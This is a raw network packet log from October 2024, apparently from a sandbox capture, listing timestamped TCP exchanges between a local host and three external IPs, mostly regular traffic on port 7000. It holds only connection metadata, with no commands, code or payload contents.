Oct 13, 2024 19:01:49.604614973 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:49.604640961 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:49.604667902 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:49.604695082 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:50.355196953 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:50.355245113 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:50.355290890 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:50.355302095 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:50.355478048 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:50.355529070 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:50.356008053 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:50.566116095 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:50.566193104 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:50.566274881 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:50.587877035 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:50.587909937 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.268316031 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.268711090 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.268750906 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.272520065 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.272599936 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.273798943 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.274017096 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.274097919 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.274305105 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.274331093 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.274445057 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.274538040 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.274857044 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.274955034 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.275099993 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.275134087 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.275151014 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.275171041 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.275268078 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.275291920 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.275322914 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.275341988 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.275382042 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.275418043 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.275423050 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.275438070 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.275469065 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.275484085 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.275500059 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.275512934 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.275549889 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.275563955 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.275614023 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.275648117 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.275661945 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.275685072 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.275690079 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.275707006 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.275739908 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.275755882 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.275775909 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.275789022 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.275835991 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.275835991 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.275873899 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.275895119 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.275929928 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.275945902 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.275986910 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.276001930 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.276026964 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.276058912 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.276099920 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.276099920 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.276127100 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.276154995 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.276194096 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.276217937 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.276241064 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.276257992 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.276295900 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.276340008 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.276365995 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.276405096 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.276427031 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.276462078 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.276462078 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.276509047 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.286000967 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.286298990 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.286343098 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:51.286385059 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.286434889 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:51.290822029 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:52.333524942 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:52.333772898 CEST	443	49751	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:52.333946943 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:52.334319115 CEST	49751	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:52.683372974 CEST	49749	80	192.168.2.4	208.95.112.1
Oct 13, 2024 19:01:52.689872980 CEST	80	49749	208.95.112.1	192.168.2.4
Oct 13, 2024 19:01:52.689944029 CEST	49749	80	192.168.2.4	208.95.112.1
Oct 13, 2024 19:01:52.985332966 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:01:52.990519047 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:53.095706940 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:53.097464085 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:01:53.102468967 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:54.477904081 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:54.505675077 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:01:54.511029005 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:54.511059999 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:54.511071920 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:54.511084080 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:54.511096001 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:54.511106968 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:54.511118889 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:54.511130095 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:59.597150087 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:59.640604019 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:01:59.850708961 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:01:59.875005007 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:00.029335022 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:00.030188084 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:00.030741930 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:00.030971050 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:00.031122923 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:00.031236887 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:00.031503916 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:00.031532049 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:00.031610012 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:04.480484009 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:04.531178951 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:04.548141956 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:04.553237915 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:04.553268909 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:04.553318977 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:04.553345919 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:04.553373098 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:04.553399086 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:04.553531885 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:04.553560019 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:07.828291893 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:07.833961010 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:07.939519882 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:07.940890074 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:07.945827961 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:09.399935961 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:09.453214884 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:09.531651974 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:09.566314936 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:09.571361065 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:09.571376085 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:09.571402073 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:09.571425915 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:09.571507931 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:09.571520090 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:09.571561098 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:09.571582079 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:14.476394892 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:14.531008005 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:14.535181046 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:14.540575027 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:14.540617943 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:14.540652990 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:14.540687084 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:14.540720940 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:14.540755033 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:14.540818930 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:14.540853024 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:19.477475882 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:19.506175041 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:19.512034893 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:19.512155056 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:19.512187958 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:19.512236118 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:19.512264013 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:19.512276888 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:19.512288094 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:19.512650013 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:22.672076941 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:22.677361012 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:22.782244921 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:22.783941984 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:22.788877010 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:24.475900888 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:24.503300905 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:24.508260012 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:24.508375883 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:24.508404016 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:24.508452892 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:24.508480072 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:24.508506060 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:24.508687019 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:24.508713961 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:28.718532085 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:28.724912882 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:28.830662966 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:28.832323074 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:28.837240934 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:29.476294041 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:29.509037971 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:29.514125109 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:29.514170885 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:29.514218092 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:29.514244080 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:29.514285088 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:29.514312029 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:29.514338017 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:34.476311922 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:34.522578001 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:34.527776003 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:34.527791977 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:34.527839899 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:34.527853012 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:34.527899027 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:34.527910948 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:34.527945995 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:34.527977943 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:39.411926031 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:39.501106024 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:39.501209974 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:39.537204981 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:39.542160988 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:39.542176008 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:39.542290926 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:39.542303085 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:39.542315006 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:39.542320013 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:39.542337894 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:39.542422056 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:40.812084913 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:40.816937923 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:40.843424082 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:40.848371983 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:40.859006882 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:40.863943100 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:40.922458887 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:40.923935890 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:40.928755999 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:41.011181116 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:41.012746096 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:41.017616034 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:41.017723083 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:41.022609949 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:41.609136105 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:41.614025116 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:41.719944954 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:41.720352888 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:41.725207090 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:41.725337029 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:41.730176926 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:41.830435038 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:41.833112001 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:41.838064909 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:44.476284027 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:44.506779909 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:44.511744976 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:44.511753082 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:44.511828899 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:44.511833906 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:44.511856079 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:44.511861086 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:44.511881113 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:44.511892080 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:49.475644112 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:49.545355082 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:49.550376892 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:49.550442934 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:49.550470114 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:49.550496101 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:49.550527096 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:49.550553083 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:49.550582886 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:49.550607920 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:50.921459913 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:50.926589012 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:51.031872988 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:51.033370972 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:51.038279057 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:51.124679089 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:51.310614109 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:51.317145109 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:51.322206020 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:51.414777994 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:51.417035103 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:51.421966076 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:51.510957003 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:51.514103889 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:51.519012928 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:51.519248009 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:51.524159908 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:51.607964039 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:51.610876083 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:51.613038063 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:51.615767002 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:51.617084026 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:51.621891975 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:54.475851059 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:54.504245996 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:54.509469032 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:54.509501934 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:54.509512901 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:54.509538889 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:54.509550095 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:54.509859085 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:54.509919882 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:54.509932041 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:59.475735903 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:59.504684925 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:02:59.509913921 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:59.509932995 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:59.509944916 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:59.509957075 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:59.509968996 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:59.509979963 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:59.510004997 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:02:59.510016918 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:01.468039989 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:01.473264933 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:01.578610897 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:01.580013990 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:01.585150003 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:04.491277933 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:04.526156902 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:04.532130957 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:04.532167912 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:04.532198906 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:04.532239914 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:04.532265902 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:04.532385111 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:04.533665895 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:04.533693075 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:06.968014956 CEST	49739	7000	192.168.2.4	198.23.219.104
